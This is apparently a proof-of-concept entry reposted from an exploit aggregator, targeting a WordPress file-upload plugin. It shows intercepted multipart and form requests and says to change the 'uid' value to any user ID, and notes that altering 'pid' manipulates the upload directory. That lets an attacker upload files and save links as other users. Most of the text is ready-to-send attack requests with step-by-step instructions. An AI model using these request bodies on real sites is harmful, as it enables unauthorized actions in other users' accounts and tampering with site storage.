Share
## https://sploitus.com/exploit?id=WPEX-ID:01427CFB-5C51-4524-9B9D-E09A603BC34C
1. Select to upload a file through the plugin
2. Intercept the request:

Example:

```

------WebKitFormBoundaryX4YnPgSA4oPHlNjv
Content-Disposition: form-data; name="file[]"; filename="IMG_0628.PNG"
Content-Type: image/png

...

------WebKitFormBoundaryX4YnPgSA4oPHlNjv
Content-Disposition: form-data; name="action"

sp_file_upload_callback
------WebKitFormBoundaryX4YnPgSA4oPHlNjv
Content-Disposition: form-data; name="uid"

2(CHANGE HERE)
------WebKitFormBoundaryX4YnPgSA4oPHlNjv
```

Modify the `2(CHANGE HERE)` value and send the request.

Modify the next request body changing `2(CHANGE HERE)` to any user ID:

```
pid=2&action=sp_cdm_link_save_embed&uid=2(CHANGE HERE)&link-name=link1&link-url=http%3A%2F%2Flocalhost%3A8020%2Flink1&dlg-upload-notes=aaa
```

Note: the upload directory can also be manipulated by changing the `pid`